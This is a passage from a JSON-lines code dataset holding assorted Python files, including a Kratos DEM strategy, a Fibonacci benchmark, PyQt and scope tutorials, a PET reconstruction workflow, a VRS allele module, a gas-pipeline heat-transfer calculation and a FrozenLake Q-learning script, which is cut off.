BaseStrategy.Initialize(self)\n BaseStrategy.SetVariablesAndOptions(self)\n\n self.CheckMomentumConservation()\n\n self.cplusplus_strategy.Initialize() # Calls the cplusplus_strategy (C++) Initialize function (initializes all elements and performs other necessary tasks before starting the time loop in Python)\n\n def CreateCPlusPlusStrategy(self):\n self.SetVariablesAndOptions()\n print('self.Parameters.IntegrationScheme',self.Parameters.IntegrationScheme)\n print('self.Parameters.do_search_neighbours',self.Parameters.do_search_neighbours)\n\n if (self.Parameters.IntegrationScheme == 'Verlet_Velocity'):\n self.cplusplus_strategy = IterativeSolverStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n self.delta_option, self.creator_destructor, self.dem_fem_search,\n self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n elif (self.Parameters.IntegrationScheme == 'Hybrid_Bashforth'):\n self.cplusplus_strategy = AdamsBashforthStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n self.delta_option, self.creator_destructor, self.dem_fem_search,\n self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n else:\n self.cplusplus_strategy = ExplicitSolverStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n self.delta_option, self.creator_destructor, self.dem_fem_search,\n self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n\n","sub_path":"kratos/applications/swimming_DEM_application/python_scripts/swimming_sphere_strategy.py","file_name":"swimming_sphere_strategy.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"61249964","text":"import time\n\ndef fibo_recursion(num):\n if num<=2:\n return 1\n return fibo_recursion(num-2) + fibo_recursion(num-1)\n\ndef fibo_iteration(n):\n a, b = 1, 1\n\n if n<=1:\n return 1\n\n for _ in range(1, n):\n a, b = b, a+b\n\n return a\n\ndef make_fibo():\n cache = [0]*10000\n def fibo_recursion(n):\n nonlocal cache\n \n # cache 체크\n if cache[n-1] != 0:\n return cache[n-1]\n\n # 기저 조건(base case)\n if n<=2:\n cache[n-1] = 1\n return 1\n\n # 점화식\n cache[n-1] = fibo_recursion(n-2) + fibo_recursion(n-1)\n return cache[n-1]\n return fibo_recursion\n\nif __name__==\"__main__\":\n \n n = 10000\n\n # 재귀\n # start = time.time()\n # for i in range(1, n+1):\n # value = fibo_recursion(i)\n # end = time.time()\n # res = end-start\n # print(f\"fibo_recursion : {res}\")\n \n # 반복문\n start2 = time.time()\n for i in range(1, n+1):\n fibo_iteration(i)\n end2 = time.time()\n res2 = end2-start2\n print(f\"fibo_iteration : {res2}\")\n\n # 재귀+메모이제이션\n start3 = time.time()\n fibo=make_fibo()\n for i in range(1, n+1):\n fibo(i)\n end3 = time.time()\n res3 = end3-start3\n print(f\"memoization : {res3}\")","sub_path":"algorithm/fibonacci/fibo_test.py","file_name":"fibo_test.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"622477670","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5.QtCore import QCoreApplication\n\nclass MyApp3(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n #*PyQt5에서 이벤트처리는 시그널과 슬롯 메커니즘\n\n btn = QPushButton('종료',self)\n btn.move(50,50)\n btn.resize(btn.sizeHint())\n\n #instance()=현재인스턴스를 반환\n btn.clicked.connect(QCoreApplication.instance().quit)\n\n self.setWindowTitle(\"종료 버튼\")\n self.setGeometry(300,300,300,200)\n self.show()\n\nif __name__ =='__main__':\n app = QApplication(sys.argv)\n ex = MyApp3()\n sys.exit(app.exec_())\n","sub_path":"tutorial/tutorial_Quit.py","file_name":"tutorial_Quit.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"223044780","text":"#! /usr/bin/env python\n\nimport os.path\nimport sys\n\nsys.path.append(\"../scripts\")\n\nfrom petmatrix import SparseMatrixHeader\n\nfrom subprocess import run\nimport argparse\n\nrecalculate = False\n\nparser = argparse.ArgumentParser(description=\"Full reconstruction workflow\")\nparser.add_argument('--recalculate', '-r', action='store_true', dest='recalculate')\nargs, rest = parser.parse_known_args()\nrecalculate = args.recalculate\nprint(recalculate)\nprint(rest)\n\ndef run_and_check(cmd):\n print(\"running \" + ' '.join(cmd))\n info=run(cmd)\n if info.returncode !=0:\n sys.exit()\n\n# Prepare system matrix\nn_emissions = 400000\nif not os.path.isfile(\"m_big\"):\n print(\"m_big file does not exists: recalculating\")\n recalculate=True\nelse:\n matrix_file = open(\"m_big\",\"rb\")\n matrix = SparseMatrixHeader(matrix_file)\n print(matrix.n_emissions)\n if matrix.n_emissions != n_emissions:\n recalculate=True\n\nrun([\"../2d_barrel_describe_scanner\",\"--big-barrel\",\"-o\",\"big_barrel\"])\n\n\nif recalculate :\n run_and_check([\"../2d_barrel_matrix\", \"-c\", \"m_big_ref.cfg\",\n \"--detector-file\",\"big_barrel_dets.txt\",\n \"--detector-file-sym\",\"big_barrel_syms.txt\",\n \"-e\", \"%d\" % (n_emissions,), \"-o\", \"m_big\",\n \"-v\"])\n\n\n# Convert to full matrix\nif recalculate or not os.path.isfile(\"f_big\"):\n run_and_check([\"../2d_barrel_matrix\", \"-c\", \"m_big.cfg\",\n \"--detector-file\",\"big_barrel_dets.txt\",\n \"--detector-file-sym\",\"big_barrel_syms.txt\",\n \"-o\", \"f_big\", \"-f\", \"m_big\"])\n\n\n# Prepare phantom\nn_phantom_emissions = 100000000\nif recalculate:\n run_and_check([\"../3d_hybrid_phantom\", \"-c\", \"m_big.cfg\", \"-o\", \"p_sphere.txt\",\n \"-e\", \"%d\" % (n_phantom_emissions,), \"s_sphere.json\", \"-v\"])\n\n# Alternatively prepare phantom wih GATE \n\n# Reconstruct\nif recalculate:\n run_and_check([\"../3d_hybrid_reconstruction\", \"-c\", \"m_big.cfg\", \"--system\", \"f_big\", \"-o\", \"r_big\",\n \"-i\", \"10\", \"-v\", \"p_sphere.txt\"])\n","sub_path":"testbed/run_with_descriptor.py","file_name":"run_with_descriptor.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"54875276","text":"\"\"\"Module for generating VRS objects\"\"\"\nfrom typing import List, Optional, Tuple, Union, Dict\n\nfrom ga4gh.vrs import models, normalize\nfrom ga4gh.core import ga4gh_identify\nfrom cool_seq_tool.data_sources import SeqRepoAccess\nfrom bioutils.accessions import coerce_namespace\n\nfrom variation.schemas.token_response_schema import AltType, AMBIGUOUS_REGIONS\n\n\nclass VRSRepresentation:\n \"\"\"Class for representing VRS objects\"\"\"\n\n def __init__(self, seqrepo_access: SeqRepoAccess) -> None:\n \"\"\"Initialize the VRSRepresentation class\n\n :param SeqRepoAccess seqrepo_access: Access to SeqRepo\n \"\"\"\n self.seqrepo_access = seqrepo_access\n\n @staticmethod\n def get_ival_start_end(\n coordinate: str, start: int, end: int, cds_start: int,\n errors: List) -> Optional[Tuple[int, int]]:\n \"\"\"Get ival_start and ival_end coordinates.\n\n :param str coordinate: Coordinate used. Must be either `p`, `c`, or `g`\n :param int start: Start position change\n :param int end: End position change\n :param int cds_start: Coding start site\n :param List errors: List of errors\n :return: Tuple[ival_start, ival_end]\n \"\"\"\n try:\n start = int(start)\n if end is None:\n end = start\n end = int(end)\n except (ValueError, TypeError):\n errors.append(\"Start/End must be valid ints\")\n return None\n\n if coordinate == \"c\":\n if cds_start:\n start += cds_start\n end += cds_start\n return start, end\n\n @staticmethod\n def get_start_indef_range(start: int) -> models.IndefiniteRange:\n \"\"\"Return indefinite range given start coordinate\n\n :param int start: Start position (assumes 1-based)\n :return: Indefinite range model\n \"\"\"\n return models.IndefiniteRange(value=start - 1, comparator=\"<=\",\n type=\"IndefiniteRange\")\n\n @staticmethod\n def get_end_indef_range(end: int) -> models.IndefiniteRange:\n \"\"\"Return indefinite range given end coordinate\n\n :param int end: End position (assumes 1-based)\n :return: Indefinite range model\n \"\"\"\n return models.IndefiniteRange(value=end, comparator=\">=\",\n type=\"IndefiniteRange\")\n\n @staticmethod\n def get_ival_certain_range(start1: int, start2: int, end1: int,\n end2: int) -> models.SequenceInterval:\n \"\"\"Return sequence interval\n\n :param int start1: Start left pos (assumes 1-based)\n :param int start2: Start right pos (assumes 1-based)\n :param int end1: End left pos (assumes 1-based)\n :param int end2: End right pos (assumes 1-based)\n :return: Sequence Interval model\n \"\"\"\n return models.SequenceInterval(\n start=models.DefiniteRange(min=start1 - 1, max=start2 - 1,\n type=\"DefiniteRange\"),\n end=models.DefiniteRange(min=end1 + 1, max=end2 + 1,\n type=\"DefiniteRange\"),\n type=\"SequenceInterval\"\n )\n\n @staticmethod\n def get_sequence_loc(\n ac: str, interval: models.SequenceInterval) -> models.Location:\n \"\"\"Return VRS location\n\n :param str ac: Accession\n :param models.SequenceInterval interval: VRS sequence interval\n :return: VRS Location model\n \"\"\"\n return models.SequenceLocation(\n sequence_id=coerce_namespace(ac),\n interval=interval, type=\"SequenceLocation\")\n\n def vrs_allele(self, ac: str, interval: models.SequenceInterval,\n sstate: Union[models.LiteralSequenceExpression,\n models.DerivedSequenceExpression,\n models.RepeatedSequenceExpression],\n alt_type: AltType, errors: List) -> Optional[Dict]:\n \"\"\"Create a VRS Allele object.\n\n :param str ac: Accession\n :param SequenceInterval interval: Sequence Interval\n :param sstate: State\n :type sstate: models.LiteralSequenceExpression or\n models.DerivedSequenceExpression or\n models.RepeatedSequenceExpression\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :return: VRS Allele object represented as a Dict\n \"\"\"\n try:\n location = self.get_sequence_loc(ac, interval)\n except ValueError as e:\n errors.append(f\"Unable to get sequence location: {e}\")\n return None\n allele = models.Allele(location=location, state=sstate, type=\"Allele\")\n # Ambiguous regions do not get normalized\n if alt_type not in AMBIGUOUS_REGIONS:\n try:\n allele = normalize(allele, self.seqrepo_access)\n except (KeyError, AttributeError) as e:\n errors.append(f\"vrs-python unable to normalize allele: {e}\")\n return None\n\n if not allele:\n errors.append(\"Unable to get allele\")\n return None\n\n seq_id, w = self.seqrepo_access.translate_identifier(\n allele.location.sequence_id._value, \"ga4gh\")\n if seq_id:\n seq_id = seq_id[0]\n allele.location.sequence_id = seq_id\n allele.location._id = ga4gh_identify(allele.location)\n allele._id = ga4gh_identify(allele)\n return allele.as_dict()\n else:\n errors.append(w)\n return None\n\n def to_vrs_allele(\n self, ac: str, start: int, end: int, coordinate: str,\n alt_type: AltType, errors: List, cds_start: int = None,\n alt: str = None) -> Optional[Dict]:\n \"\"\"Translate accession and position to VRS Allele Object.\n\n :param str ac: Accession\n :param int start: Start position change\n :param int end: End position change\n :param str coordinate: Coordinate used. Must be either `p`, `c`, or `g`\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :param int cds_start: Coding start site\n :param str alt: Alteration\n :return: VRS Allele Object\n \"\"\"\n ival_coords = self.get_ival_start_end(coordinate, start, end,\n cds_start, errors)\n if not ival_coords:\n return None\n if ival_coords[0] > ival_coords[1]:\n ival_end, ival_start = ival_coords\n else:\n ival_start, ival_end = ival_coords\n\n # Right now, this follows HGVS conventions\n # This will change once we support other representations\n if alt_type == AltType.INSERTION:\n state = alt\n ival_end = ival_start\n elif alt_type in {AltType.SUBSTITUTION, AltType.DELETION, AltType.DELINS,\n AltType.SILENT_MUTATION, AltType.NONSENSE}:\n if alt_type == AltType.SILENT_MUTATION:\n state, _ = self.seqrepo_access.get_reference_sequence(ac, ival_start)\n if state is None:\n errors.append(f\"Unable to get sequence on {ac} from \"\n f\"{ival_start}\")\n return None\n else:\n state = alt or \"\"\n ival_start -= 1\n elif alt_type == AltType.DUPLICATION:\n ref, _ = self.seqrepo_access.get_reference_sequence(\n ac, ival_start, ival_end + 1)\n if ref is not None:\n state = ref + ref\n else:\n errors.append(f\"Unable to get sequence on {ac} from \"\n f\"{ival_start} to {ival_end + 1}\")\n return None\n ival_start -= 1\n else:\n errors.append(f\"alt_type not supported: {alt_type}\")\n return None\n\n interval = models.SequenceInterval(\n start=models.Number(value=ival_start, type=\"Number\"),\n end=models.Number(value=ival_end, type=\"Number\"),\n type=\"SequenceInterval\")\n sstate = models.LiteralSequenceExpression(sequence=state,\n type=\"LiteralSequenceExpression\")\n return self.vrs_allele(ac, interval, sstate, alt_type, errors)\n\n def to_vrs_allele_ranges(\n self, ac: str, coordinate: str, alt_type: AltType, errors: List,\n ival: models.SequenceInterval) -> Optional[Dict]:\n \"\"\"Translate variation ranges to VRS Allele Object.\n\n :param str ac: Accession\n :param str coordinate: Coordinate used. Must be either `p`, `c`, or `g`\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :param models.SequenceInterval ival: Sequence Interval\n :return: VRS Allele object\n \"\"\"\n if coordinate == \"c\":\n # TODO: Once we add support for ranges on c. coord\n return None\n if alt_type in {AltType.UNCERTAIN_DELETION, AltType.UNCERTAIN_DUPLICATION,\n AltType.DELETION_RANGE, AltType.DUPLICATION_RANGE}:\n sstate = models.LiteralSequenceExpression(\n sequence=\"\", type=\"LiteralSequenceExpression\"\n )\n else:\n errors.append(\"No state\")\n return None\n\n return self.vrs_allele(ac, ival, sstate, alt_type, errors)\n","sub_path":"variation/vrs_representation.py","file_name":"vrs_representation.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"530586516","text":"# ECDeise\n\nimport sys, getopt\n\ndef parseArgs(argv):\n \"\"\" Parse command line arguments\n sample calls\n python3 Path_Finder.py -i 'DataSets/test_data.dat' -o '-1' -a 'astar' -d 3\n python3 Path_Finder.py -i 'DataSets/set1.dat' -o 'DataSets/set1_outfile.dat' -a 'astar' -d 1\n\n Args:\n argv: command line arguments.\n -h: help\n -i: inputfile\n -o: outputfile\n -a: search alrgithm\n -d: distance heuristic\n Returns:\n inputfile: the inputfile path\n outputfile: output file path\n searchalg: search algorithm (currently only a_start implemented)\n heuristic: distance heuristic (Euclid, Manhattan, Tchebychev)\n Raises:\n e: GetoptError.\n \"\"\"\n inputfile = None\n outputfile = None\n searchalg = 'astar'\n heuristic = 1\n width = 0\n height = 0\n obstacle = 0.0\n try:\n opts, args = getopt.getopt(argv,\"hi:o:a:d:x:y:b:\",[\"ifile=\",\"ofile=\",\"asrchalg=\",\"heuristic=\",\"width=\",\"height=\",\"obstacle=\"])\n except getopt.GetoptError:\n displayCommandLineHelpText()\n sys.exit(2)\n if len(opts) < 2 or len(opts) > 10:\n displayCommandLineHelpText()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-q':\n displayCommandLineHelpText()\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n elif opt in (\"-a\", \"--srchalg\"):\n searchalg = arg\n elif opt in (\"-d\", \"--heuristic\"):\n heuristic = arg\n elif opt in (\"-x\", \"--width\"):\n width = arg\n elif opt in (\"-y\", \"--height\"):\n height = arg\n elif opt in (\"-b\", \"--obstacle\"):\n obstacle = arg\n print ('Applying search algorithm %s to data at %s writing results to %s' % (searchalg, inputfile, outputfile))\n print (inputfile, outputfile, searchalg, heuristic, width, height, obstacle)\n return inputfile, outputfile, searchalg, heuristic, width, height, obstacle\n\ndef displayCommandLineHelpText():\n print ('With Map File Specified ... Path_Finder.py -i -o '\n '-a e.g., astar, idastar -d <1,2,3> (1)Euclid, '\n '(2)Manhattan, (3)Tchebychev ... Generate a Random Map By Parameter ... '\n 'Path_Finder.py -a e.g., astar, idastar -d <1,2,3> '\n '(1)Euclid, (2)Manhattan, (3)Tchebychev '\n '-w -h -o ')\n\n","sub_path":"base/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"95653239","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date: 2021 01 27\n# Author: xDong@wandtec\n\n\nclass ControlPanel(object):\n \"\"\"\n 使用new方法实现一个简单的单例模式\n \"\"\"\n __singleton = None\n\n def __init__(self, pos):\n self.pos = pos\n print('用户从', pos, '打开了控制面板')\n\n def __new__(cls, *args, **kwargs):\n if cls.__singleton is None:\n obj = object.__new__(cls) #__new__方法的参数是类 这个对象。\n cls.__singleton = obj\n \n print(cls.__singleton)\n return cls.__singleton\n\n def network_setting(self, name):\n print('用户设置了新的网卡', name)\n\n\nc1 = ControlPanel('北京')\nc2 = ControlPanel('上海')\nc3 = ControlPanel('深圳') \nprint(c1, c2, c3)\nc1.network_setting('虚拟网卡')\nc2.network_setting('无线网卡')\nc3.network_setting('USB网卡')\n","sub_path":"my_notes/探索设计模式-单例.py","file_name":"探索设计模式-单例.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"133112180","text":"\nDOMAIN = 'xiaomi_miot'\nDEFAULT_NAME = 'Xiaomi Miot'\n\nCONF_MODEL = 'model'\nCONF_XIAOMI_CLOUD = 'xiaomi_cloud'\nCONF_SERVER_COUNTRY = 'server_country'\nCONF_CONFIG_VERSION = 'config_version'\n\nSUPPORTED_DOMAINS = [\n 'sensor',\n 'binary_sensor',\n 'switch',\n 'light',\n 'fan',\n 'climate',\n 'cover',\n 'humidifier',\n 'media_player',\n 'camera',\n 'vacuum',\n 'air_quality',\n 'water_heater',\n 'device_tracker',\n 'number',\n]\n\nGLOBAL_CUSTOMIZES = {\n\n 'models': {\n 'chuangmi.plug.212a01': {\n 'chunk_properties': 7,\n },\n 'cgllc.airm.cgdn1': {\n 'chunk_properties': 9,\n },\n 'deerma.humidifier.jsq3': {\n 'chunk_properties': 6,\n },\n 'yeelink.light.nl1': {\n 'interval_seconds': 15,\n },\n 'lumi.sensor_motion.*': {\n 'interval_seconds': 15,\n 'motion_timeout': 60,\n },\n 'lumi.sensor_magnet.*': {\n 'interval_seconds': 15,\n },\n 'xiaomi.tv.*': {\n 'number_properties': 'speaker.volume',\n },\n '*.fishbowl.*': {\n 'number_properties': 'feeding_measure',\n },\n '*.feeder.*': {\n 'number_properties': 'feeding_measure',\n },\n },\n\n}\n\nTRANSLATION_LANGUAGES = {\n 'zh': {\n 'off': '关闭',\n 'idle': '空闲',\n 'busy': '工作中',\n 'pause': '暂停',\n 'fault': '错误',\n\n 'vacuum.mode': {\n 'Silent': '安静',\n 'Basic': '标准',\n 'Strong': '强力',\n },\n\n 'washer.mode': {\n 'Daily Wash': '日常洗',\n 'Quick Wash': '快速洗',\n 'Delicate Wash': '轻柔洗',\n 'Down Coat': '羽绒服',\n 'Heavy Wash': '强力洗',\n 'User Define': '自定义',\n 'Rinse': '单漂洗',\n 'Spin': '单脱水',\n 'Cotton': '棉麻洗',\n 'Synthetic': '化纤洗',\n 'Shirt': '衬衣洗',\n 'Boiling': '高温洗',\n 'Wool': '羊毛洗',\n 'Drum Clean': '筒自洁',\n 'Baby Care': '婴童洗',\n 'Intensive': '精细洗',\n 'Jacket': '夹克洗',\n 'Wash Dry': '洗+烘',\n 'Underwear': '内衣洗',\n 'Dry': '单烘干',\n 'Dry Air Wash': '空气洗',\n 'Quick Wash Dry': '快洗烘',\n },\n 'washer.drying_level': {\n 'moist': '微湿',\n 'normal': '正常',\n 'extra': '特干',\n 'none': '无烘干',\n },\n },\n}\n","sub_path":"custom_components/xiaomi_miot/core/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"432846120","text":"import sys\nimport math\n# sys.path.append('D:\\\\hossein sharifi 96-01-19\\\\behinesazan\\\\narmafzar\\\\myqtdesigner\\\\AgaQt')\n# sys.path.append('C:\\\\Users\\\\Hossein\\\\Desktop\\\\myqtdesigner\\\\96-02-20\\\\GasStationSoftware\\\\myqtdesigner\\\\AgaQt')\nfrom AgaQt import Gas\nfrom math import exp\nfrom scipy.optimize import fsolve\n\n\n\nclass Reynolds():\n ID = 0.4\n OD = 0.5\n pipeLength = 20\n Tin = 5\n T_air = 20\n\n def __init__(self, P , Tin):\n self.P = P\n self.Tin = Tin\n\n print('pipeLength, ID, OD ---> after init', self.pipeLength, self.ID, self.OD)\n\n g = Gas()\n g.P = P\n g.calculate(g.P, 273.15 + Tin)\n g2 = Gas()\n g2.calculate(g2.p_theta, g2.T_theta)\n Qdot = (100000/3600) * (g2.P * g.Z * g.T)/(g.P * g2.Z * g2.T)\n\n A = math.pi * self.ID * self.ID / 4\n V = Qdot/A\n # print('\\nV is = ' + str(V))\n\n self.g = g\n\n mdot = Qdot * g.rou\n self.mdot = mdot\n # print('mdot is = ' + str(math.fsum(mdot)))\n\n\n rou = g.rou * 0.001\n T = g.T * 1.8\n Mg = g.M\n X = 3.5 + 986 / T + 0.01 * Mg\n Y = 2.4 - 0.2 * X\n K = ((9.4 + 0.02 * Mg) * T ** 1.5) / (209 + 19 * Mg + T)\n mu = (K * 10 ** -4) * exp(X * rou ** Y)\n\n self.R = g.rou * V * self.ID / (mu * 0.001)\n # print('rou, V, mu', g.rou, V, mu)\n\n\n LtoDratio = self.pipeLength / self.ID\n\n\n k_gas = 0.05\n\n Pr = g.C_p * mu / k_gas # [mu] --> cp, [C_p] --> kJ/kg.K, [k_gas (thermal conductivity)] --> W/m.K\n x = 1000\n GzD = self.R * Pr / (x / self.ID)\n # print('Prandtl = ' + str(math.fsum(Pr)), '\\nGzD^-1 = ' + str(math.fsum(1 / GzD)))\n\n # entrance region\n if Pr > 0.1:\n Nu = 4.36\n h = k_gas * Nu / self.ID\n # print('h gas with Nu (4.36) is = ' + str(h))\n # Tin = self.Tin\n\n\n v_air = 5\n hair = 10.45 - v_air + 10 * v_air ** (1 / 2)\n # hair = 0.06\n gamma = g.M / 28.966\n # print(gamma)\n k_steel = 52 # thermal conductivity of steel is 45 W/m.K\n q_ = (self.T_air - Tin) / (1/hair + 1/h + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n\n # print('Re * Pr = ' + str(math.fsum(Pr * self.R)))\n # print('Reynolds is = ' + str(math.fsum(self.R)))\n\n\n\n\n\n\n\n # self.m = 0\n friction = fsolve(self.friction, -7)\n friction = math.fabs(friction)\n deltaP = friction * g.rou * (V**2 / (2*self.ID)) * self.pipeLength\n P = deltaP * Qdot\n\n\n ##\n Nu = ((friction / 8) * (self.R - 1000) * Pr) / (1 + 12.7 * ((friction / 8) ** 0.5) * (Pr ** (2/3) - 1))\n h_gas = Nu * k_gas/self.ID\n # print(\"h gas = \" + str(math.fsum(h_gas)))\n # print('Nu is = ' + str(math.fsum(Nu)))\n\n\n self.h_Total = (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n # print('H_total is = ' + str(self.h_Total))\n #\n Tm_o = fsolve(self.tOutCal, Tin + 1)\n # print(\"till hear!!!\")\n\n\n q_ = (self.T_air - self.Tin) / (1/hair + 1/h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n\n ##\n Nu = 4.82 + 0.0185 * (self.R * Pr) ** 0.827\n\n h_gas = Nu * k_gas / self.ID\n # print(\"h gas = \" + str(math.fsum(h_gas)))\n # print('Nu is = ' + str(math.fsum(Nu)))\n\n q_ = (self.T_air - Tin) / (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n Q = q_ * self.OD * math.pi * self.pipeLength\n # print('Qflux is = ' + str(q_), '\\nQ = ' + str(Q))\n\n deltaTpipe = Q / (mdot * g.C_p * 1000)\n # print('deltaT is = ' + str(math.fsum(deltaTpipe)))\n\n self.h_Total = 1 / (1 / hair + 1 / h_gas + ((self.OD - self.ID) / math.log(self.OD / self.ID)) / k_steel)\n # print('H_total is = ' + str(self.h_Total))\n\n # Tm_o = fsolve(self.tOutCal, Tin + 1)\n # print(\"till hear!!!\")\n #\n # print('new one')\n # print('h_total is = ' + str(self.h_Total))\n self.Tout = (self.Tin - self.T_air) * exp(-math.pi*self.ID * self.pipeLength * self.h_Total / (self.mdot * g.C_p * 1000)) + self.T_air\n print('Tout is = ' + str(self.Tout))\n print('Qdot = ' + str(self.mdot * g.C_p * 1000 * (self.Tout - self.Tin)))\n\n\n\n\n def friction(self, f):\n # self.m +=1\n if f <= 0:\n f = math.fabs(f)\n\n\n return 1 / math.sqrt(f) + 2 * math.log2(0.01 / (0.4 * 3.7) + 2.57 / (self.R * math.sqrt(f)))\n\n def tOutCal(self, tout):\n # print('H total is = ' + str(self.h_Total))\n # print('T air is = ' + str(self.T_air), '\\nT in is = ' + str(self.Tin))\n # print(\"T_out is = \" + str(math.fsum(tout)))\n\n # if To >= self.T_air:\n # To = self.T_air - 1\n deltaTm = ((self.T_air - tout) - (self.T_air - self.Tin)) / math.log((self.T_air - tout)/(self.T_air - self.Tin))\n\n return ((self.mdot * self.g.C_p * 1000) * ((tout - self.Tin) / deltaTm)) / (math.pi * self.ID * self.pipeLength) \\\n - self.h_Total\n\n def calcul(self, pipelength, ID, OD):\n self.pipeLength = pipelength\n self.ID = ID\n self.OD = OD\n print('pipeLength, ID, OD', self.pipeLength, self.ID, self.OD)\n self.__init__(self.P, self.Tin)\n\n\n\nif __name__ == \"__main__\":\n R = Reynolds(5000, 5)\n R.calcul(50, 0.5, 0.7)\n","sub_path":"GasLineCalTest.py","file_name":"GasLineCalTest.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560600952","text":"#!/usr/bin/env python3\n# scope2.py - scope rules\n\nname = \"scope\" # name is global\nnum = 55 # num is global\n\ndef myfunc(str): # THIS HIDES str BUILT-IN\n new = name + \" \" + str # new, str are local\n num = 100 # num local, hides global\n new += \" \" + str(num) # str is built-in\n return new\n\nanswer = myfunc(\"rules\") # answer is global\nprint(num) # prints 55\nprint(answer) # prints scope rules 100\n\n#####################################\n#\n# $ scope2.py\n# Traceback (most recent call last):\n# File \"./scope2.py\", line 13, in \n# answer = myfunc(\"rules\") # answer is global\n# File \"./scope2.py\", line 10, in myfunc\n# new += \" \" + str(num) # str is built-in\n# TypeError: 'str' object is not callable\n#\n","sub_path":"learning/training/python/py3/pgms/sec4/scope2.py","file_name":"scope2.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"14006224","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n@source: https://www.youtube.com/watch?v=VYOq-He90bE&list=PLlMkM4tgfjnKsCWav-Z2F-MMFRx-2gMGG&index=7\r\n@written by: Sung KIM\r\n@modified by: Hyung-Kwon Ko\r\n@created on: Jul 17 19:03 2019\r\n@last modified date: 2019-07-19\r\n\"\"\"\r\n\r\n# import required packages\r\nimport numpy as np\r\nimport gym\r\nimport matplotlib.pyplot as plt\r\nfrom gym.envs.registration import register\r\n \r\n# parameter setting\r\ngamma = 0.99 # discounted reward (factor)\r\nnum_episodes = 2000 # number of iteration\r\nlearning_rate = 0.85 # learning rate\r\n\r\n# setting module\r\nclass Lab5:\r\n def __init__(self, id):\r\n self.env = gym.make(id)\r\n \r\n # Use E & E as default, but can change by setting noise = 1\r\n def algorithm(self, iter = 2000, noise = 0, gamma = 0.99, lr = 0.85):\r\n '''\r\n @param iter: number of iteration\r\n @param noise: E&E or Noise\r\n @param gamma: discounted factor\r\n @return Q: Q-Table\r\n @return rList: set of reward as list\r\n '''\r\n \r\n # Create lists to contain total rewards and steps per episode\r\n rList = []\r\n\r\n #Initialize table with all zeros\r\n Q = np.zeros([self.env.observation_space.n, self.env.action_space.n])\r\n\r\n for i in range(iter):\r\n # Reset environment and get first new observation\r\n state = self.env.reset()\r\n rAll = 0\r\n done = False\r\n \r\n # 'e' is for E & E algorithm\r\n e = 1. / ((i / 100) + 1)\r\n \r\n # The Q-Table learning algorithm\r\n while not done:\r\n if(noise):\r\n # Add noise - Choose an action by greedily (with noise) picking from Q table\r\n action = np.argmax(Q[state, :] + np.random.randn(1, self.env.action_space.n) / (i+1))\r\n else:\r\n # Choose an action by e value\r\n if(np.random.rand(1) < e):\r\n action = self.env.action_space.sample()\r\n else:\r\n action = np.argmax(Q[state, :])\r\n \r\n # Get new state and reward from environment\r\n new_state, reward, done, _ = self.env.step(action)\r\n \r\n # Update Q table\r\n Q[state, action] = (1-lr) * Q[state, action] + lr*(reward+ gamma*np.max(Q[new_state, :]))\r\n\r\n rAll += reward\r\n state = new_state\r\n rList.append(rAll)\r\n return Q, rList\r\n\r\n# run program\r\nif __name__ == \"__main__\":\r\n\r\n # Set env\r\n l5 = Lab5('FrozenLake-v0')\r\n\r\n # User chooses\r\n noise = input(\"E/E(0) or Noise(1)? \")\r\n \r\n # Run algorithm\r\n Q, rList = l5.algorithm(iter = num_episodes, noise = int(noise), gamma = gamma, 